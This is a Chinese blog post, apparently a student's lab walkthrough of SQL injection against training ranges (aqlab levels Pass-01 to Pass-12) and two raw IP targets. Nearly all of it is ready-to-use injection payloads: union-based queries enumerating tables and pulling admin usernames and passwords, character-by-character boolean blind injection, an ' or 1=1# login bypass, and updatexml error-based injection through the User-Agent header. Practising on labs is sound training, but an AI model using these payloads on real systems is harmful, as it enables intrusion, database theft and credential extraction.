sql注入实战（一）

最新推荐文章于 2024-10-09 17:44:57 发布

whiteso

最新推荐文章于 2024-10-09 17:44:57 发布

阅读量767

点赞数

分类专栏：安全

本文链接：https://blog.csdn.net/qq_42333641/article/details/112854034

版权

安全专栏收录该内容

4 篇文章 0 订阅

订阅专栏

注入思路

判断是否可以注入–>猜解字段长度–>爆破数据库名，数据库版本信息–>爆破表名–>爆破字段名–>爆破字段值
参考：注入例子

实例靶场 http://59.63.200.79:8003/

http://59.63.200.79:8003/?id=1 and 1=1 order by 3
http://59.63.200.79:8003/?id=1 and 1=2 union select 1,database()
http://59.63.200.79:8003/?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 1,2 用database()代替当前库名
http://59.63.200.79:8003/?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name=‘admin’ limit 1,1
http://59.63.200.79:8003/?id=1 and 1=2 union select 1,username from admin limit 0,1
http://59.63.200.79:8003/?id=1 and 1=2 union select 1,password from admin limit 0,1
实例靶场 117.167.136.245:10181/shownews.asp?id=170
117.167.136.245:10181/shownews.asp?id=170 and 1=1
117.167.136.245:10181/shownews.asp?id=170 order by 10
117.167.136.245:10181/shownews.asp?id=170 order by 11
117.167.136.245:10181/shownews.asp?id=170 union select 1,2,3,4,5,6,7,8,9,10 from admin

一数据库查询语句

select *from user where id=1 http://injectx1.lab.aqlab.cn:81/Pass-01/index.php?id=1

id =1 and 1=2
id =1 and 1=1 order by 3
id=0 union select 1,2,database()
id=0 union select 1,2,version()
id=0 union select 1,2,table_name from information_schema.tables where table_schema=database()
id=0 union select 1,2,column_name from information_schema.columns where table_schema=database() and table_name=‘error_flag’
id=0 union select 1,2,column_name from information_schema.columns where table_schema=database() and table_name=‘error_flag’ limit 1,1
id=0 union select 1,2,column_name from information_schema.columns where table_schema=database() and table_name=‘error_flag’ limit 2,1
id=0 union select 1,2,flag from error_flag limit 1,1
zKaQ-BJY

二数据库查询语句

select *from user where id=‘1’ http://injectx1.lab.aqlab.cn:81/Pass-02/index.php?id=1

id=1’ and 1=1 – 1
id=1’ and 1=2 – 1
id=1’ and 1=1 order by 3 – 1
id=1’ and 1=1 order by 4 – 1
id=1’ union select 1,2,database() – 1
id=1’ union select 1,2,version() – 1
id=1’ union select 1,2,table_name from information_schema.tables where table_schema=database() – 1
id=0’ union select 1,2,table_name from information_schema.tables where table_schema=database() – 1
id=0’ union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1 – 1
id=0’ union select 1,2,table_name from information_schema.tables where table_schema=database() limit 1,1 – 1
id=0’ union select 1,2,column_name from information_schema.columns where table_schema=database() and table_name=‘error_flag’ limit 0,1 – 1 这个两个个字段
id=0’ union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘user’ limit 0,1 – 1 这个三个字段
id=0’ union select 1,2,column_name from information_schema.columns where table_schema=database() and table_name=‘error_flag’ limit 1,1 – 1
id=0’ union select 1,2,flag from error_flag limit 1,1 – 1
zKaQ-BJY

三数据库查询语句

http://injectx1.lab.aqlab.cn:81/Pass-03/index.php?id=1
select *from user where id=(‘1’)

id=1’) and 1=1 – 1
id=1’) and 1=2 – 1
id=1’) and 1=1 order by 3 – 1
id=1’) and 1=1 order by 4 – 1
id=0’) union select 1,2,database() – 1
id=0’) union select 1,2,version() – 1
id=1’)union select 1,2,table_name from information_schema.tables where table_schema=database() – 1
id=0’) union select 1,2,table_name from information_schema.tables where table_schema=database() – 1
id=0’) union select 1,2,group_concat(table_name） from information_schema.tables where table_schema=database() – 1
id=0’) union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘error_flag’ limit 0,1 – 1
id=0’) union select 1,2,column_name from information_schema.columns where table_schema=database() and table_name=‘error_flag’ limit 1,1 – 1
id=0’) union select 1,2,flag from error_flag limit 1,1 – 1

zKaQ-BJY

四数据库查询语句

http://injectx1.lab.aqlab.cn:81/Pass-04/index.php?id=1
select *from user where id=(“1”)

id=1") and 1=1 – 1
id=1") and 1=2 – 1
id=1") and 1=1 order by 3 – 1
id=1") and 1=1 order by 4 – 1
id=1") union select 1,2,database() – 1
id=0") union select 1,2,version() – 1
id=1"))union select 1,2,table_name from information_schema.tables where table_schema=database() – 1
id=0") union select 1,2,group_concat(table_name） from information_schema.tables where table_schema=database() – 1
id=0")’ union select 1,2,table_name from information_schema.tables where table_schema=database() limit 1,1 – 1
id=0") union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘error_flag’ – 1
id=0") union select 1,2,flag from error_flag limit 1,1 – 1
zKaQ-Nf

五数据库查询语句

http://injectx1.lab.aqlab.cn:81/Pass-10/index.php?id=1
select *from news where id=1

id=1 and 1=1
id=1 and 1=2
id =1 order by 2
id=1 and length(database())>11
id=1 and length(database())>12
id=1 and substr(database(),1,1)=‘k’
id=1 and ascii(substr(database(),1,1))>105 手注，一个一个试就行了
id=1 and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)=‘l’ brupsuit查询表名
id=1 and ascii(substr((select table_name from information_schema.tables where table_schema=‘kanwolongxia’ limit 3,1),1,1))>0 错误，说明就三个表
loflag news user
然后user应该时二个字段
id=1 and substr((select column_name from information_schema.columns where table_schema=database() and table_name=‘loflag’ limit 0,1),1,1)=‘f’
id=1 and substr((select flaglo from loflag limit 0,1),1,1)=‘1’
采用brupsuit注入大小写无法确认，要在网站进行单个字母确认
老师给的
需要用到的函数
Length() 返回字符串的长度 Substr() 截取字符串 Ascii()返回字符的ascii码
1.判断是否存在注入
and 1=1 页面正常
and 1=2 页面不正常
2.猜字段数
and 1=1 order by 2
查显错位
and 1=2 union select 1,2
发现没有回显
对比昨天的题目
昨天的显错注入，发现能够查出来回显点在2,3位，而今天的靶场实战查不出回显点，我们尝试盲注。
查数据库的长度
and length(database()) =12 得出数据库名长度为12
5查数据库名
and ascii(substr(database(),1,1))=107 对比ASCII码表对应字符为k
and ascii(substr(database(),2,1))=97 对比ASCII码表对应字符为a
and ascii(substr(database(),3,1))=110 对比ASCII码表对应字符为n
and ascii(substr(database(),4,1))=119 对比ASCII码表对应字符为w
and ascii(substr(database(),5,1))=111 对比ASCII码表对应字符为o
and ascii(substr(database(),6,1))=108 对比ASCII码表对应字符为l
and ascii(substr(database(),7,1))=111 对比ASCII码表对应字符为o
and ascii(substr(database(),8,1))=110 对比ASCII码表对应字符为n
and ascii(substr(database(),9,1))=103 对比ASCII码表对应字符为g
and ascii(substr(database(),10,1))=120 对比ASCII码表对应字符为x
and ascii(substr(database(),11,1))=105 对比ASCII码表对应字符为i
and ascii(substr(database(),12,1))=97 对比ASCII码表对应字符为a
数据库名kanwolongxia
6.查表名
and ascii(substr((select table_name from information_schema.tables where table_schema=‘kanwolongxia’ limit 0,1),1,1))=108 对比ASCII码表对应字符为l
and ascii(substr((select table_name from information_schema.tables where table_schema=‘kanwolongxia’ limit 0,1),2,1))=111 对比ASCII码表对应字符为o
and ascii(substr((select table_name from information_schema.tables where table_schema=‘kanwolongxia’ limit 0,1),3,1))=102 对比ASCII码表对应字符为f
and ascii(substr((select table_name from information_schema.tables where table_schema=‘kanwolongxia’ limit 0,1),4,1))=108 对比ASCII码表对应字符为l
and ascii(substr((select table_name from information_schema.tables where table_schema=‘kanwolongxia’ limit 0,1),5,1))=97 对比ASCII码表对应字符为a
and ascii(substr((select table_name from information_schema.tables where table_schema=‘kanwolongxia’ limit 0,1),6,1))=103 对比ASCII码表对应字符为g
查出表名为loflag
查字段名
and ascii(substr((select column_name from information_schema.columns where table_name=‘loflag’ limit 1,1),1,1))=102 对比ASCII码表对应字符为f
and ascii(substr((select column_name from information_schema.columns where table_name=‘loflag’ limit 1,1),2,1))=108 对比ASCII码表对应字符为l
and ascii(substr((select column_name from information_schema.columns where table_name=‘loflag’ limit 1,1),3,1))=97 对比ASCII码表对应字符为a
and ascii(substr((select column_name from information_schema.columns where table_name=‘loflag’ limit 1,1),4,1))=103 对比ASCII码表对应字符为g
and ascii(substr((select column_name from information_schema.columns where table_name=‘loflag’ limit 1,1),5,1))=108 对比ASCII码表对应字符为l
and ascii(substr((select column_name from information_schema.columns where table_name=‘loflag’ limit 1,1),6,1))=111 对比ASCII码表对应字符为o
查出字段flaglo
查数据
and ascii(substr((select flaglo from loflag limit 0,1),1,1))=122 对比ASCII码表对应字符为z
and ascii(substr((select flaglo from loflag limit 0,1),2,1))=75 对比ASCII码表对应字符为K
and ascii(substr((select flaglo from loflag limit 0,1),3,1))=97 对比ASCII码表对应字符为a
and ascii(substr((select flaglo from loflag limit 0,1),4,1))=81 对比ASCII码表对应字符为Q
and ascii(substr((select flaglo from loflag limit 0,1),5,1))=45 对比ASCII码表对应字符为-
and ascii(substr((select flaglo from loflag limit 0,1),6,1))=81 对比ASCII码表对应字符为Q
and ascii(substr((select flaglo from loflag limit 0,1),7,1))=81 对比ASCII码表对应字符为Q
and ascii(substr((select flaglo from loflag limit 0,1),8,1))=81 对比ASCII码表对应字符为Q
得到flag zKaQ-QQQ

七数据库查询语句

http://injectx1.lab.aqlab.cn:81/Pass-12/index.php
select *from user where username=’’ and password=’’
1’ or 1=1#
1’ or 1=1 and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)=‘l’ #
brupsuit查表，查出表再查列
1’ or 1=1 and substr((select column_name from information_schema.columns where table_schema=database() and table_name=‘loflag’ limit 0,1),1,1)=‘f’ #
1’ or 1=1 and substr((select flaglo from loflag limit 0,1),1,1)=‘x’#
是这个意思，查了四个表，都不对，不查了，浪费时间了，感觉就跟搬砖是的
八数据库查询语句 http://injectx1.lab.aqlab.cn:81/Pass-07/index.php
select *from user where username=’’ and password=’’

1.输入正确的账号密码 admin 123456
2.打开代理
点击登录，打开burp抓包，可以用modheader简单
修改User-Agent 输入’ or updatexml(1,concat(0x7e,(select database())),1),1)#

点击Forward 返回靶场得到数据库名head_error
修改User-Agent 输入’ or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘head_error’ limit 0,1)),1),1)#
修改User-Agent 输入’ or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name=‘flag_head’ limit 0,1)),1),1)#
修改User-Agent 输入’ or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name=‘flag_head’ limit 1,1)),1),1)#
修改User-Agent 输入’ or updatexml(1,concat(0x7e,(select flag_h1 from flag_head limit 0,1)),1),1)#